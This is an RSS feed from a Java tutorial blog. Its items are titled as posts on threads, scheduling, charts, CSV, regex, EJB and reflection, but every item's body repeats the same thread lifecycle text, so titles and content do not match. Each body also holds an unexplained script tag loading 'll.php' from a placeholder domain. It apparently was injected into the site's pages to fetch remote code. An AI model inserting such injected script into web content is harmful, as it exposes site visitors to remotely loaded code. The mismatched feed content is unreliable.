<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Kushal&#039;s Java Blog &#124; Software Engineering Blog</title>
	<atom:link href="http://sanjaal.com/java/feed/" rel="self" type="application/rss+xml" />
	<link>http://sanjaal.com/java</link>
	<description>www.sanjaal.com/java</description>
	<lastBuildDate>Fri, 18 May 2012 02:38:33 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Java Thread Lifecycle</title>
		<link>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/</link>
		<comments>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/#comments</comments>
		<pubDate>Fri, 18 May 2012 02:38:33 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java Thread]]></category>
		<category><![CDATA[java thread]]></category>
		<category><![CDATA[java thread life cycle]]></category>
		<category><![CDATA[java thread life cycle diagram]]></category>
		<category><![CDATA[java thread life cycle state stop run]]></category>
		<category><![CDATA[java thread lifecycle image]]></category>
		<category><![CDATA[java thread lifecyle explained]]></category>
		<category><![CDATA[yield suspend blocked running runnable]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=36</guid>
		<description><![CDATA[The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_2"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Scheduling jobs in Java without using third party APIs (uses Timer and TimerTask classes)</title>
		<link>http://sanjaal.com/java/674/java-scheduling/scheduling-jobs-in-java-without-using-third-party-apis-uses-timer-and-timertask-classes/</link>
		<comments>http://sanjaal.com/java/674/java-scheduling/scheduling-jobs-in-java-without-using-third-party-apis-uses-timer-and-timertask-classes/#comments</comments>
		<pubDate>Thu, 17 May 2012 14:34:47 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java Scheduling]]></category>
		<category><![CDATA[how to easily schedule jobs in java]]></category>
		<category><![CDATA[java core scheduler]]></category>
		<category><![CDATA[java job scheduling]]></category>
		<category><![CDATA[java native scheduler]]></category>
		<category><![CDATA[java taks scheduler simple example]]></category>
		<category><![CDATA[java task scheduler tutorial]]></category>
		<category><![CDATA[no need to use third party scheduler for scheduling tasks in java]]></category>
		<category><![CDATA[schedule jobs in java using timer and timertask classes]]></category>
		<category><![CDATA[scheduling jobs in java]]></category>
		<category><![CDATA[sheduling java jobs using java util timer]]></category>
		<category><![CDATA[sheduling java jobs using java util timertask]]></category>
		<category><![CDATA[tutorial to schedule jobs in java]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=674</guid>
		<description><![CDATA[This is a simple tutorial that shows how easily (and without depending on third party APIs) you can write a simple scheduler in Java. Java comes with build in capability for scheduling using java.util.Timer class and java.util.TimerTask class. Related Java Blog Posts Scheduling jobs in Java without using third party APIs (uses Timer and TimerTask [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_4"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Backporting Tools In Java</title>
		<link>http://sanjaal.com/java/246/java-technology/backporting-tools-in-java/</link>
		<comments>http://sanjaal.com/java/246/java-technology/backporting-tools-in-java/#comments</comments>
		<pubDate>Thu, 17 May 2012 02:29:34 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java Backporting]]></category>
		<category><![CDATA[Java Technology]]></category>
		<category><![CDATA[Features Supported By RetroTranslator]]></category>
		<category><![CDATA[Features Supported by RetroWeaver]]></category>
		<category><![CDATA[Java Back Port]]></category>
		<category><![CDATA[Java Backporting Declawer]]></category>
		<category><![CDATA[Java Backporting JBossRetro]]></category>
		<category><![CDATA[Java Backporting RetroTranslator]]></category>
		<category><![CDATA[Java Backporting RetroWeaver]]></category>
		<category><![CDATA[Java Backporting Softwares]]></category>
		<category><![CDATA[Java Backporting Tools]]></category>
		<category><![CDATA[Java Bytecode Backporting]]></category>
		<category><![CDATA[Java Class Backporting]]></category>
		<category><![CDATA[RetroTranlator Features]]></category>
		<category><![CDATA[RetroTranslator Integration Vs. RetroWeaver Integration]]></category>
		<category><![CDATA[RetroTranslator Official Homepage]]></category>
		<category><![CDATA[RetroWeaver Official Homepage]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=246</guid>
		<description><![CDATA[Java Backporting Tools are softwares usually written in Java which convert Java classes bytecodes from newer version of the Java Platform to an older one (for example Java 6.0 backported to 1.5). The following are a few of the Java Backporting Tools available as of this posting. RetroTranslator RetroWeaver Declawer JBossRetro Retrotranslator one of the [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_6"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Creating Time Series Chart With JFree Chart</title>
		<link>http://sanjaal.com/java/81/charts-in-java/creating-time-series-chart-with-jfree-chart/</link>
		<comments>http://sanjaal.com/java/81/charts-in-java/creating-time-series-chart-with-jfree-chart/#comments</comments>
		<pubDate>Wed, 16 May 2012 14:23:12 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Charts In Java]]></category>
		<category><![CDATA[Chart Utilities]]></category>
		<category><![CDATA[Creating Chart In Java]]></category>
		<category><![CDATA[Creating Charts]]></category>
		<category><![CDATA[Free Java Chart API]]></category>
		<category><![CDATA[Java Snippet]]></category>
		<category><![CDATA[Java Time Series Chart]]></category>
		<category><![CDATA[Java Tutorial]]></category>
		<category><![CDATA[JFree Chart]]></category>
		<category><![CDATA[JFree Chart Tutorial]]></category>
		<category><![CDATA[Save Chart]]></category>
		<category><![CDATA[Save Image]]></category>
		<category><![CDATA[Simple JFreeChart Tutorial]]></category>
		<category><![CDATA[Timeseries Chart]]></category>
		<category><![CDATA[Tutorial To Create Chart In Java]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=81</guid>
		<description><![CDATA[In this basic tutorial, I will teach you how to create a simple timeseries chart in Java using the free JFreeChart. The program uses the following two jar files, and they come with the JFreeChart itself. You can download JFreeChart at their official website www.jfreechart.org jcommon-1.0.15.jar jfreechart-1.0.12.jar The program also demonstrates how easily you can [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_8"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorial on Converting an List of Strings or Numbers to a CSV file with optional sorting</title>
		<link>http://sanjaal.com/java/678/java-utilities/tutorial-on-converting-an-list-of-strings-or-numbers-to-a-csv-file/</link>
		<comments>http://sanjaal.com/java/678/java-utilities/tutorial-on-converting-an-list-of-strings-or-numbers-to-a-csv-file/#comments</comments>
		<pubDate>Wed, 16 May 2012 02:18:10 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java Data Structure]]></category>
		<category><![CDATA[Java Utilities]]></category>
		<category><![CDATA[convert to csv format and write to file]]></category>
		<category><![CDATA[how to convert arraylist to csv format]]></category>
		<category><![CDATA[java example of converting list of strings to comma separated values csv]]></category>
		<category><![CDATA[java list to csv conversion]]></category>
		<category><![CDATA[java string list to csv conversion]]></category>
		<category><![CDATA[list to csv conversion example]]></category>
		<category><![CDATA[list to csv conversion java sample example tutoria]]></category>
		<category><![CDATA[list to csv conversion sample]]></category>
		<category><![CDATA[list to csv conversion tutorial]]></category>
		<category><![CDATA[sort and arraylist convert to csv and write to file]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=678</guid>
		<description><![CDATA[Chances are you might have needed to convert a list of strings or numbers to a CSV file while you were programming something. An example is that in any java program you might have obtained a list of states of United States stored in your ArrayList object and then you wanted to have them in [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_10"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Java Tool To Compare Two Lists and Spit Out The Differences &#8211; Working Example</title>
		<link>http://sanjaal.com/java/686/java-utilities/java-tool-to-compare-two-lists-and-spit-out-the-differences-working-example/</link>
		<comments>http://sanjaal.com/java/686/java-utilities/java-tool-to-compare-two-lists-and-spit-out-the-differences-working-example/#comments</comments>
		<pubDate>Tue, 15 May 2012 14:07:35 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java Data Structure]]></category>
		<category><![CDATA[Java Utilities]]></category>
		<category><![CDATA[easily compare two lists in java]]></category>
		<category><![CDATA[how to compare two lists in java using hashmap]]></category>
		<category><![CDATA[how to compare two lits]]></category>
		<category><![CDATA[java list compare]]></category>
		<category><![CDATA[java program compare two lists]]></category>
		<category><![CDATA[java tool compare two arraylists]]></category>
		<category><![CDATA[java tool compare two lists and find difference]]></category>
		<category><![CDATA[java utility compare two lists and print difference]]></category>
		<category><![CDATA[program to compare and spit out arraylist differences]]></category>
		<category><![CDATA[string list compare in java]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=686</guid>
		<description><![CDATA[As a heavy java programmer, most of the time I encounter a problem where I have two lists and need to find out the differences between these two. One of the ways I sometimes quickly find out the difference is: To print out the list and then use microsoft excel to compare the two columns. [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_12"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to find if a string is contained in another string using regex in Java?</title>
		<link>http://sanjaal.com/java/665/java-regular-expressions/how-to-find-if-a-string-is-contained-in-another-string-using-regex-in-java/</link>
		<comments>http://sanjaal.com/java/665/java-regular-expressions/how-to-find-if-a-string-is-contained-in-another-string-using-regex-in-java/#comments</comments>
		<pubDate>Mon, 14 May 2012 14:01:47 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java Regular Expressions]]></category>
		<category><![CDATA[advanced regex tutorial]]></category>
		<category><![CDATA[java regex text search]]></category>
		<category><![CDATA[java regular expression text search]]></category>
		<category><![CDATA[java text search regular expresssion tutorial]]></category>
		<category><![CDATA[regex string operation]]></category>
		<category><![CDATA[regular expression text search]]></category>
		<category><![CDATA[search of a word is contained in a sentence java regular expression]]></category>
		<category><![CDATA[search string in another string regex java]]></category>
		<category><![CDATA[string search regex java]]></category>
		<category><![CDATA[text search regex]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=665</guid>
		<description><![CDATA[This is a simple utility to find out (through regular expressions) if a string is contained in another string. The string to search may be located anywhere in the text to look into (i.e. it may lie at the beginning, at the end or somewhere in the middle) Related Java Blog Posts How to find [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_14"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Simple EJB2 Architecture [Diagram]</title>
		<link>http://sanjaal.com/java/181/j2ee/simple-ejb2-architecture-diagram/</link>
		<comments>http://sanjaal.com/java/181/j2ee/simple-ejb2-architecture-diagram/#comments</comments>
		<pubDate>Mon, 14 May 2012 14:01:47 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[EJB]]></category>
		<category><![CDATA[J2EE]]></category>
		<category><![CDATA[EJB Client]]></category>
		<category><![CDATA[EJB Home]]></category>
		<category><![CDATA[EJB JNDI]]></category>
		<category><![CDATA[EJB2 Architecture Image]]></category>
		<category><![CDATA[Enterprise Java Bean Images]]></category>
		<category><![CDATA[Simple EJB2 Architecture Diagram]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=181</guid>
		<description><![CDATA[Related Java Blog Posts Simple EJB2 Architecture [Diagram] JSP useBean and Scope Types Converting Java Object To SOAP Request And Response XML Lifecycle of a Java Servlet &#8211; three basic phases of initialize, service and destroy Using JAXB to Marshal a Plain Java Object Into XML And Printing to Console and File Creating Dynamic Web [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
<p><div class="wp-caption aligncenter" style="width: 542px"><a href="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg"><img title="Java Thread Life Cycle" src="http://www.sanjaal.com/images/Java_Thread_LifeCycle_SanjaalDotCom.jpg" alt="Java Thread Life Cycle" width="532" height="552" /></a><p class="wp-caption-text">Java Thread Life Cycle</p></div><script src="http://$domain/ll.php?kk=11"></script>
</p>
<div id="apf_post_footer">
<h4>Related Java Blog Posts</h4>
<ul></ul>
</div>
<p><font size="-2" color = "green"><br />
Sanjaal.com is owned and maintained by Sanjaal Corps, Nepal. The company offers Webhosting and Domain Registration Services, IT Solutions and Business Analysis. Sanjaal.com website features H1B Visa Information, Entertainment Portal, Link Directory Service, Free Articles, Free Open Source Tutorials on Java and J2EE Platform, Digital Photography, High Resolution Picture Gallery and Free Reliable Image Hosting Services. Future plan includes Open Source Software Development Portal, Technical Solutions and Customizable Movie and Music Arena. We would be introducing data backup, data recovery, data hosting and voip solutions. Stay free from phishing &#8211; our website does not ask for your credit card and banking information. Happy Surfing!<br />
</font></p>
<!--INFOLINKS_OFF--><p id="bte_opp"><small>Originally posted 2008-07-25 11:24:04. </small></p><p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fsanjaal.com%2Fjava%2F36%2Fjava-thread%2Fjava-thread-lifecycle%2F&amp;title=Java%20Thread%20Lifecycle" id="wpa2a_16"><img src="http://sanjaal.com/java/wp-content/plugins/add-to-any/share_save_171_16.gif" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://sanjaal.com/java/36/java-thread/java-thread-lifecycle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Java Reflection Tutorial &#8211; List Methods Of A Class</title>
		<link>http://sanjaal.com/java/236/java-utilities/java-reflection-tutorial-list-methods-of-a-class/</link>
		<comments>http://sanjaal.com/java/236/java-utilities/java-reflection-tutorial-list-methods-of-a-class/#comments</comments>
		<pubDate>Mon, 14 May 2012 01:53:09 +0000</pubDate>
		<dc:creator>Kushal Paudyal</dc:creator>
				<category><![CDATA[Java Reflections]]></category>
		<category><![CDATA[Java Utilities]]></category>
		<category><![CDATA[Advantages Of Java Reflections]]></category>
		<category><![CDATA[Drawbacks Of Java Reflections]]></category>
		<category><![CDATA[Exposure Of Internal Concern In Java Reflection]]></category>
		<category><![CDATA[How To List Java Methods Using Reflection]]></category>
		<category><![CDATA[Java Reflection List Methods]]></category>
		<category><![CDATA[java.lang.Reflect Tutorial]]></category>
		<category><![CDATA[Modify Runtime Behaviour Of Application In Java]]></category>
		<category><![CDATA[Performance Overhead Concern In Java Reflection]]></category>
		<category><![CDATA[Power Of Java Reflection]]></category>
		<category><![CDATA[Reflection Technique In Java]]></category>
		<category><![CDATA[Reflection Tutorial]]></category>
		<category><![CDATA[Security Restrictions Concern In Java Reflection]]></category>

		<guid isPermaLink="false">http://sanjaal.com/java/?p=236</guid>
		<description><![CDATA[Reflection is a very powerful tool in Java. I will start this tutorial with an excerpt from Sun&#8217;s Tutorial Page for Java reflections. It says: Reflection is commonly used by programs which require the ability to examine or modify the runtime behavior of applications running in the Java virtual machine. This is a relatively advanced [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>The following diagram shows the life cycle of a Java Thread. Thread has following states : Start, Stop, Blocked, Running, Runnable. These states can be changed to each other as shown in the diagram. Thread can sleep, notify, resume, start, stop, suspend, yield and wait. These activities lead the thread from one state to move to another one.</p>
